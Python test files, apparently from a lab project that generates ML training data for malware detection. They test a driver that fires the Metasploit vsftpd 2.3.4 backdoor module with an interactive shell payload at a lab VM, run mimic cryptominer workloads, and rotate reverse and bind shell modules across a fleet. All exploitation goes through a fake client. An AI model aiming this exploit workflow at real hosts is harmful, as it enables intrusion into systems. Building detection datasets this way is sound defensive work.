# workload, which comes before kill+logout.
assert names.index("exploit_fire") < names.index("session_open")
assert names.index("session_open") < names.index("session_landing_probe")
assert names.index("session_landing_probe") < names.index("sample_executed")
assert names.count("sample_executed") == 2 # two infected_running phases
assert names.count("session_dormant") == 2
assert "session_killed" in names
# Driver should have asked the FakeClient to fire exactly once.
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
_, args, _ = fire_calls[0]
assert args[1] == "unix/ftp/vsftpd_234_backdoor"
assert args[2]["RHOSTS"] == "10.200.0.10"
assert args[2]["PAYLOAD"] == "cmd/unix/interact"
def test_session_open_timeout_emits_timeout_event() -> None:
# No sessions ever appear after fire.
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
names = [e[0] for e in events]
assert "session_open_timeout" in names
assert "session_open" not in names
def test_workload_phases_are_no_op_without_session() -> None:
driver, client, events = _make_driver(sessions_after_fire={})
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting") # times out, no session
driver.set_phase("infected_running")
driver.set_phase("dormant")
# No shell writes should have happened.
assert client.shell_writes == []
def test_arm_is_idempotent() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("armed")
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
def test_teardown_kills_session_and_logs_out() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.teardown()
assert any(c[0] == "session_stop" for c in client.calls)
assert client.logged_in is False
assert any(e[0] == "session_killed" for e in events)
# -----------------------------------------------------------------------
# Driver wired into a real EpisodeRunner — events land in events.jsonl
# -----------------------------------------------------------------------
# -----------------------------------------------------------------------
# Driver v2 — sample-profile-driven workloads
# -----------------------------------------------------------------------
def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
"""When constructed with a Sample, the driver should send the
profile's start_cmd at infected_running rather than the v1
yes-loop. The actual command body is owned by exploits.workloads
and tested there; here we just confirm dispatch."""
from samples.manifest import Sample as _Sample
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
)
events: list[tuple[str, dict]] = []
sample = _Sample(
name="xmrig-cryptominer",
family="XMRig",
category="cryptominer",
profile="cpu-saturate",
)
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=lambda ev, **kw: events.append((ev, kw)),
sample=sample,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
driver.set_phase("dormant")
driver.teardown()
# The shell command sent at infected_running should be the
# profile's multi-line wrapper — NOT the v1 single-yes line.
starts = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
assert starts == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
# The driver_setup event records sample + workload metadata.
setup_events = [kw for (e, kw) in events if e == "driver_setup"]
assert setup_events
assert setup_events[0]["sample"] == "xmrig-cryptominer"
assert setup_events[0]["sample_kind"] == "mimic"
assert setup_events[0]["workload_profile"] == "cpu-saturate"
# sample_executed carries the profile name + description.
se = [kw for (e, kw) in events if e == "sample_executed"]
assert se
assert se[0]["profile"] == "cpu-saturate"
assert se[0]["sample"] == "xmrig-cryptominer"
def test_v2_distinct_workloads_per_profile() -> None:
"""Two different profiles must produce *different* shell commands.
This is the property that gives the ML model varied envelopes to
learn from."""
from exploits.workloads import all_profiles, workload_for
from samples.manifest import Sample as _Sample
profiles = all_profiles()
assert len(profiles) >= 4
seen_starts: set[str] = set()
for p in profiles:
s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
w = workload_for(s)
assert w is not None
seen_starts.add(w.start_cmd)
# Every profile must have a distinct start_cmd.
assert len(seen_starts) == len(profiles), \
"two profiles produced the same workload — ML diversity is at risk"
def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
from exploits.workloads import workload_for
from samples.manifest import Sample as _Sample
s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
w = workload_for(s)
assert w is not None
assert w.profile == "cpu-saturate"
def test_v1_path_still_works_when_no_sample() -> None:
"""Ensure backwards compat: a driver constructed without a sample
uses the original yes-loop workload."""
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=lambda *a, **kw: None,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
driver.teardown()
assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
"""When the driver is connected to a real EpisodeRunner, the
events it emits must show up in the episode's events.jsonl with
monotonic-clock timestamps (so labels and exploit events can be
correlated downstream)."""
import os
from orchestrator.episode import EpisodeConfig, EpisodeRunner
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
)
schedule = [
("clean", 0.05),
("armed", 0.05),
("infecting", 0.05),
("infected_running", 0.05),
("dormant", 0.05),
("clean", 0.05),
]
ec = EpisodeConfig(
target_pid=os.getpid(),
duration_s=sum(d for _, d in schedule),
interval_ms=20,
data_root=tmp_path,
phase_schedule=schedule,
)
runner = EpisodeRunner(ec)
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=runner.emit_event,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
events = [
json.loads(l)
for l in (result.episode_dir / "events.jsonl").read_text().splitlines()
]
names = [e["event"] for e in events]
assert "snapshot_load" in names
assert "driver_setup" in names
assert "exploit_fire" in names
assert "session_open" in names
assert "sample_executed" in names
assert "session_dormant" in names
assert "episode_end" in names
# Driver events must carry monotonic timestamps in episode-relative
# order (snapshot_load is essentially at origin, exploit_fire later,
# session_open later still, episode_end last).
by_name = {e["event"]: e for e in events}
assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin
assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]

392
tests/test_fleet.py Normal file

@ -0,0 +1,392 @@
"""Tests for fleet capacity calculation + sample manifest selection.
Capacity is unit-tested via deterministic monkeypatching of /proc and
os.cpu_count so the math is exercised independently of the host
running the suite. Sample selection has its own tests covering the
"different hosts pick different samples" property.
"""
from __future__ import annotations
from pathlib import Path
import pytest
from orchestrator import fleet
from samples.manifest import Sample, SampleManifest
REPO_ROOT = Path(__file__).resolve().parent.parent
# ---------------------------------------------------------------------------
# Capacity
# ---------------------------------------------------------------------------
def _patch_capacity_inputs(
monkeypatch,
*,
cores: int,
ram_total_mib: int,
ram_available_mib: int,
load_1m: float = 0.0,
) -> None:
monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
monkeypatch.setattr(
fleet, "_read_meminfo",
lambda: {
"MemTotal": ram_total_mib * 1024 * 1024,
"MemAvailable": ram_available_mib * 1024 * 1024,
},
)
monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
def test_capacity_8core_idle_box(monkeypatch) -> None:
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.cores_total == 8
assert c.cores_reserved == 1 # 8 // 8 = 1
assert c.max_by_cores == 7
# Plenty of RAM, idle → cores binding.
assert c.max_concurrent == 7
assert "binding=cores" in c.rationale
def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
# 8 cores but only ~2 GiB free → ram caps below cores.
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
c = fleet.detect_capacity(ram_per_vm_mib=320)
# headroom = max(1024, 4096//8) = 1024
# max_by_ram = (2048 - 1024) // 320 = 3
assert c.max_by_ram == 3
assert c.max_concurrent == 3
def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
# 8 cores, plenty of RAM, but load_1m / cores > 0.75
_patch_capacity_inputs(
monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
load_1m=7.0, # 7/8 = 0.875 > 0.75
)
c = fleet.detect_capacity(ram_per_vm_mib=320)
# max_by_cores = 7; max_by_load = max(1, 7//2) = 3
assert c.max_by_load == 3
assert c.max_concurrent == 3
def test_capacity_pi5_class(monkeypatch) -> None:
"""4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.cores_total == 4
assert c.max_concurrent == 3
def test_capacity_minimal_box(monkeypatch) -> None:
"""1-core 1 GiB host shouldn't try to run any VMs."""
_patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
c = fleet.detect_capacity(ram_per_vm_mib=320)
assert c.max_concurrent == 0
def test_capacity_to_dict_round_trips(monkeypatch) -> None:
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
c = fleet.detect_capacity(ram_per_vm_mib=320)
d = c.to_dict()
assert d["cores_total"] == 4
assert d["max_concurrent"] == c.max_concurrent
assert "rationale" in d
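The arithmetic these capacity tests rely on can be sketched as a standalone function. This is a reconstruction from the test comments only, not the code of `fleet.detect_capacity`: the name `sketch_capacity`, the reserve rule `max(1, cores // 8)`, and the returned dictionary keys are assumptions. The headroom formula, the halving under load, and the 0.75 threshold are taken from the comments in the tests.

```python
from __future__ import annotations


def sketch_capacity(
    cores: int,
    ram_total_mib: int,
    ram_available_mib: int,
    load_1m: float = 0.0,
    ram_per_vm_mib: int = 320,
) -> dict:
    """Return the per-resource limits and the binding one (hypothetical shape)."""
    # Assumed rule: always keep at least one core for the host itself.
    cores_reserved = max(1, cores // 8)
    max_by_cores = max(0, cores - cores_reserved)

    # From the test comment: headroom = max(1024, total // 8), in MiB.
    headroom_mib = max(1024, ram_total_mib // 8)
    max_by_ram = max(0, (ram_available_mib - headroom_mib) // ram_per_vm_mib)

    # From the test comment: a 1-minute load above 0.75 per core halves concurrency.
    busy = cores > 0 and (load_1m / cores) > 0.75
    max_by_load = max(1, max_by_cores // 2) if busy else max_by_cores

    limits = {"cores": max_by_cores, "ram": max_by_ram, "load": max_by_load}
    # min() returns the first key with the smallest value, so ties go to "cores".
    binding = min(limits, key=limits.get)
    return {
        "cores_reserved": cores_reserved,
        "max_by_cores": max_by_cores,
        "max_by_ram": max_by_ram,
        "max_by_load": max_by_load,
        "max_concurrent": limits[binding],
        "binding": binding,
    }


idle_8core = sketch_capacity(8, 16384, 14000)
low_ram = sketch_capacity(8, 4096, 2048)
high_load = sketch_capacity(8, 16384, 14000, load_1m=7.0)
pi5 = sketch_capacity(4, 7951, 5223)
minimal = sketch_capacity(1, 1024, 512)
```

Under these assumptions the sketch reproduces the values the tests assert: 7 for the idle 8-core box, 3 when RAM binds, 3 under high load, 3 for the Pi 5 class host, and 0 for the minimal box.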
# ---------------------------------------------------------------------------
# Sample manifest
# ---------------------------------------------------------------------------
def test_repo_manifest_loads() -> None:
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
assert len(m) >= 4
# Every entry has required fields.
for s in m.samples:
assert s.name and s.family and s.category and s.profile
# All "mimic" today; will switch as real samples are added.
assert all(s.kind == "mimic" for s in m.samples)
def test_selection_is_deterministic() -> None:
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
a = m.select(host_id="lab-1", slot=2, episode_index=5)
b = m.select(host_id="lab-1", slot=2, episode_index=5)
assert a is b
def test_selection_differs_across_hosts() -> None:
"""Two hosts on the same slot/episode should generally hit
different samples (probabilistic: assert on the distribution, not
individual equality).
"""
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
if len(m) < 2:
pytest.skip("manifest too small for diversity check")
matches = 0
for slot in range(20):
a = m.select(host_id="alice", slot=slot, episode_index=0)
b = m.select(host_id="bob", slot=slot, episode_index=0)
if a is b:
matches += 1
# If the catalog has N samples, the naive collision rate is ~1/N. With
# 20 trials and N≥4 we expect at most ~5 matches; the threshold of 15
# leaves generous slack so the test stays stable.
assert matches < 15, "host_id seed isn't producing variety"
def test_selection_walks_catalog_across_episodes() -> None:
"""A single host over many episodes should hit every sample at
least once."""
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
seen = set()
for ep in range(200):
seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
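One way to get the three properties tested above (determinism, variation across hosts, and full catalog coverage over episodes) is a hashed per-host offset plus the episode index. This is a sketch under assumptions: `select_index` is a hypothetical helper, and the real `SampleManifest.select` may use a different scheme.

```python
from __future__ import annotations

import hashlib


def select_index(n: int, host_id: str, slot: int, episode_index: int) -> int:
    """Pick a catalog index in [0, n) from (host_id, slot, episode_index)."""
    if n <= 0:
        raise ValueError("catalog must not be empty")
    # A stable hash (unlike the built-in hash(), which is salted per process)
    # gives each host/slot pair its own starting offset.
    digest = hashlib.sha256(f"{host_id}:{slot}".encode()).digest()
    offset = int.from_bytes(digest[:8], "big")
    # Adding the episode index walks the whole catalog every n episodes.
    return (offset + episode_index) % n


catalog = ["sample-a", "sample-b", "sample-c", "sample-d"]
first = catalog[select_index(len(catalog), "lab-1", 2, 5)]
again = catalog[select_index(len(catalog), "lab-1", 2, 5)]
seen = {
    catalog[select_index(len(catalog), "lab-x", 0, ep)]
    for ep in range(len(catalog))
}
```

Because the episode index is added modulo the catalog size, any run of `n` consecutive episodes on one host and slot visits every entry exactly once, which is a stronger guarantee than the 200-episode coverage check needs.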
def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\n'
'family = "y"\n'
'# missing category\n'
'profile = "z"\n'
)
with pytest.raises(ValueError, match="category"):
SampleManifest.load(p)
def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
p = tmp_path / "bad.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\n'
'family = "y"\n'
'category = "fish"\n'
'profile = "z"\n'
)
with pytest.raises(ValueError, match="category"):
SampleManifest.load(p)
def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
p = tmp_path / "dup.toml"
p.write_text(
'[[sample]]\n'
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
'\n[[sample]]\n'
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
)
with pytest.raises(ValueError, match="duplicate"):
SampleManifest.load(p)
# ---------------------------------------------------------------------------
# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
# ---------------------------------------------------------------------------
class _RecordingPopen:
"""Replacement for subprocess.run that just records what it would
have invoked. Returns a returncode-0 result."""
calls: list[dict] = []
def __init__(self, args, **kwargs) -> None:
# Mimic CompletedProcess shape.
type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
self.returncode = 0
self.stdout = b""
self.stderr = b""
def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
from exploits.modules import load_module_configs
from orchestrator import fleet
from samples.manifest import SampleManifest
repo_root = REPO_ROOT
return fleet.FleetConfig(
host_id="test-host",
repo_root=repo_root,
data_root=tmp_path,
manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
modules=load_module_configs(repo_root / "exploits" / "modules"),
force_tier2=force_tier2,
)
def _patch_subprocess(monkeypatch):
from orchestrator import fleet
_RecordingPopen.calls = []
monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier3", res
assert res.module_name in cfg.modules
cmd = _RecordingPopen.calls[-1]["args"]
# The Tier-3 runner is what gets invoked.
assert any("run_tier3_demo.py" in str(a) for a in cmd)
# The module name is plumbed through.
assert "--module" in cmd
assert res.module_name in cmd
def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
assert res.module_name is None
cmd = _RecordingPopen.calls[-1]["args"]
assert any("run_real_vm_demo.py" in str(a) for a in cmd)
def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
from samples.manifest import SampleManifest
cfg = fleet.FleetConfig(
host_id="test-host",
repo_root=REPO_ROOT,
data_root=tmp_path,
manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
modules={}, # explicitly empty
)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert res.tier == "tier2"
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
"""Fleet must filter out callback-payload modules when BRIDGE is
unset; otherwise the exploit fires but the session never lands
and the episode degenerates to a 30 s session_open_timeout."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.delenv("BRIDGE", raising=False)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen_modules = set()
for ep in range(20):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen_modules.add(res.module_name)
# Every selected module must be callback-free (same-socket).
callback_modules = {
m.name for m in cfg.modules.values() if m.requires_bridge
}
assert callback_modules, "test setup error: expected some requires_bridge modules"
assert not (seen_modules & callback_modules), \
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
"""With BRIDGE set, the full catalog (including reverse/bind shell
payloads) is in rotation."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
seen = set()
for ep in range(40):
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
if res.tier == "tier3" and res.module_name:
seen.add(res.module_name)
assert seen == set(cfg.modules.keys()), \
f"only saw {seen}/{set(cfg.modules.keys())}"
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
"""When BRIDGE is set in the parent env, the per-slot subprocess
env must carry it through so launch_target.sh enters tap+bridge mode."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
monkeypatch.setenv("BRIDGE", "br-malware")
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
assert _RecordingPopen.calls[-1]["env"]["BRIDGE"] == "br-malware"
def test_fleet_assigns_unique_port_base_per_slot(monkeypatch, tmp_path) -> None:
"""Concurrent Tier-3 slots can't share the host-side hostfwd port
or all targets stomp on each other's vsftpd:21 → 21 mapping. The
fleet must shift PORT_BASE per slot."""
from orchestrator import fleet
cfg = _fleet_cfg_with_modules(tmp_path)
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
_patch_subprocess(monkeypatch)
capacity = fleet.detect_capacity()
sample = cfg.manifest.samples[0]
fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
fleet._run_slot(cfg, slot=1, sample=sample, episode_index=0, capacity=capacity)
fleet._run_slot(cfg, slot=2, sample=sample, episode_index=0, capacity=capacity)
port_bases = [c["env"]["PORT_BASE"] for c in _RecordingPopen.calls]
assert len(set(port_bases)) == len(port_bases), \
f"PORT_BASE collision across slots: {port_bases}"
def test_manifest_marks_real_when_sha256_present(tmp_path: Path) -> None:
p = tmp_path / "real.toml"
p.write_text(
'[[sample]]\n'
'name = "real-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
'sha256 = "abc123"\n'
'\n[[sample]]\n'
'name = "mimic-one"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
)
m = SampleManifest.load(p)
by_name = {s.name: s for s in m.samples}
assert by_name["real-one"].kind == "real"
assert by_name["mimic-one"].kind == "mimic"

152
tests/test_guest_agent.py Normal file

@ -0,0 +1,152 @@
"""Tests for the host-side guest-agent collector.
We simulate the in-guest agent by spinning up a unix socket server
(stand-in for the QEMU virtio-serial chardev) that writes a few
JSON-lines rows. The collector should read them, re-stamp with the
host's monotonic clock, and persist to telemetry-guest.jsonl.
"""
from __future__ import annotations
import json
import socket
import threading
import time
from pathlib import Path
import pytest
from collectors import guest_agent
class FakeAgentServer(threading.Thread):
def __init__(self, sock_path: Path, rows: list[dict], delay_s: float = 0.05) -> None:
super().__init__(daemon=True)
self.sock_path = sock_path
self.rows = rows
self.delay_s = delay_s
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(sock_path))
self._sock.listen(1)
self._sock.settimeout(5.0)
def run(self) -> None:
try:
conn, _ = self._sock.accept()
except socket.timeout:
return
try:
for row in self.rows:
conn.sendall((json.dumps(row) + "\n").encode())
time.sleep(self.delay_s)
time.sleep(0.1)
finally:
conn.close()
self._sock.close()
def test_collector_reads_jsonl_and_restamps(tmp_path: Path) -> None:
sock_path = tmp_path / "agent.sock"
rows_in = [
{
"t_guest_mono_ns": 1, "t_guest_wall_ns": 2,
"source": "guest_agent", "available_in_deployment": True,
"mem_total_bytes": 256 * 1024 * 1024,
"mem_available_bytes": 200 * 1024 * 1024,
"load_1m_5m_15m": [0.1, 0.05, 0.0],
"cpu_total_jiffies": {"user": 10, "system": 5, "idle": 1000},
},
{
"t_guest_mono_ns": 100_000_000, "t_guest_wall_ns": 100_000_002,
"source": "guest_agent", "available_in_deployment": True,
"mem_total_bytes": 256 * 1024 * 1024,
"mem_available_bytes": 198 * 1024 * 1024,
},
]
server = FakeAgentServer(sock_path, rows_in, delay_s=0.02)
server.start()
out_path = tmp_path / "telemetry-guest.jsonl"
stop = threading.Event()
def stop_after(ms: int) -> None:
time.sleep(ms / 1000.0)
stop.set()
threading.Thread(target=stop_after, args=(300,), daemon=True).start()
rows_written = guest_agent.run_loop(
socket_path=sock_path,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
stop_event=stop,
connect_timeout_s=2.0,
)
server.join(timeout=2)
assert rows_written == 2
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
assert len(persisted) == 2
for orig, got in zip(rows_in, persisted):
# Original guest timestamps preserved.
assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
# Host-clock fields added.
assert "t_mono_ns" in got
assert "t_wall_ns" in got
assert got["source"] == "guest_agent"
assert got["available_in_deployment"] is True
def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
rows = guest_agent.run_loop(
socket_path=tmp_path / "no-socket-here.sock",
output_path=tmp_path / "out.jsonl",
t_mono_origin_ns=time.monotonic_ns(),
stop_event=threading.Event(),
connect_timeout_s=0.5,
)
assert rows == 0
def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
sock_path = tmp_path / "agent.sock"
# Will be sent verbatim; the malformed line should be skipped.
payload = (
b'{"source":"guest_agent","mem_total_bytes":1}\n'
b'this-is-not-json\n'
b'{"source":"guest_agent","mem_total_bytes":2}\n'
)
class Server(threading.Thread):
def __init__(self) -> None:
super().__init__(daemon=True)
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._sock.bind(str(sock_path))
self._sock.listen(1)
def run(self) -> None:
conn, _ = self._sock.accept()
try:
conn.sendall(payload)
time.sleep(0.2)
finally:
conn.close()
self._sock.close()
s = Server()
s.start()
out_path = tmp_path / "out.jsonl"
stop = threading.Event()
threading.Thread(
target=lambda: (time.sleep(0.4), stop.set()), daemon=True
).start()
rows = guest_agent.run_loop(
socket_path=sock_path,
output_path=out_path,
t_mono_origin_ns=time.monotonic_ns(),
stop_event=stop,
connect_timeout_s=2.0,
)
s.join(timeout=2)
assert rows == 2
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
assert [r["mem_total_bytes"] for r in persisted] == [1, 2]
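The behaviour these collector tests check (keep the guest's own fields, add host-clock fields, skip lines that are not valid JSON) can be sketched without any socket. This is an illustration, not the body of `guest_agent.run_loop`: the function name `restamp` is hypothetical, and treating `t_mono_ns` as relative to `t_mono_origin_ns` is an assumption based on how the episode tests describe timestamps.

```python
from __future__ import annotations

import json
import time
from typing import Iterable, Iterator


def restamp(lines: Iterable[bytes | str], t_mono_origin_ns: int) -> Iterator[dict]:
    """Yield each valid JSON object with host-side timestamps added."""
    for raw in lines:
        if isinstance(raw, bytes):
            raw = raw.decode("utf-8", errors="replace")
        raw = raw.strip()
        if not raw:
            continue
        try:
            row = json.loads(raw)
        except json.JSONDecodeError:
            # A malformed line is dropped; later lines are still processed.
            continue
        if not isinstance(row, dict):
            continue
        # Guest-side fields such as t_guest_mono_ns are left as received.
        row["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns  # assumed episode-relative
        row["t_wall_ns"] = time.time_ns()
        yield row


payload = (
    b'{"source":"guest_agent","t_guest_mono_ns":1,"mem_total_bytes":1}\n'
    b"this-is-not-json\n"
    b'{"source":"guest_agent","t_guest_mono_ns":2,"mem_total_bytes":2}\n'
)
rows = list(restamp(payload.splitlines(), t_mono_origin_ns=time.monotonic_ns()))
```

Here `rows` holds two dictionaries, one per valid input line, each carrying both the original guest timestamp and the added host fields.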

188
tests/test_pcap.py Normal file

@ -0,0 +1,188 @@
"""Tests for the pcap collector's pure-Python parser + bucketizer.
We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
records with controlled timestamps), feed it to ``bucketize()``, and
verify the produced netflow.jsonl rows are correct.
"""
from __future__ import annotations
import json
import struct
from pathlib import Path
import pytest
from collectors import pcap
# ---------------------------------------------------------------------------
# pcap synthesis helpers
# ---------------------------------------------------------------------------
_PCAP_GLOBAL_HDR = struct.pack(
"<IHHiIII",
0xa1b2c3d4, # magic (us)
2, 4, # version
0, # thiszone
0, # sigfigs
65535, # snaplen
1, # linktype = LINKTYPE_ETHERNET
)
def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
s = bytes(int(x) for x in src.split("."))
d = bytes(int(x) for x in dst.split("."))
total_len = 20 + len(payload)
return struct.pack(
">BBHHHBBH",  # network byte order; 12 header bytes precede the two addresses
0x45, # version=4, IHL=5
0, # tos
total_len,
0, 0, 64, proto,
0, # checksum (don't care)
) + s + d + payload
def _tcp(sport: int, dport: int, flags: int) -> bytes:
# Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
return struct.pack(">HHIIBBHHH",
sport, dport,
0, 0,
0x50, # data offset = 5 (no options)
flags,
0, 0, 0)
def _udp(sport: int, dport: int, length: int = 8) -> bytes:
return struct.pack(">HHHH", sport, dport, length, 0)
def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
def _record(ts_ns: int, frame: bytes) -> bytes:
sec = ts_ns // 1_000_000_000
usec = (ts_ns // 1000) % 1_000_000
return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
out = bytearray(_PCAP_GLOBAL_HDR)
for ts, frame in records:
out += _record(ts, frame)
return bytes(out)
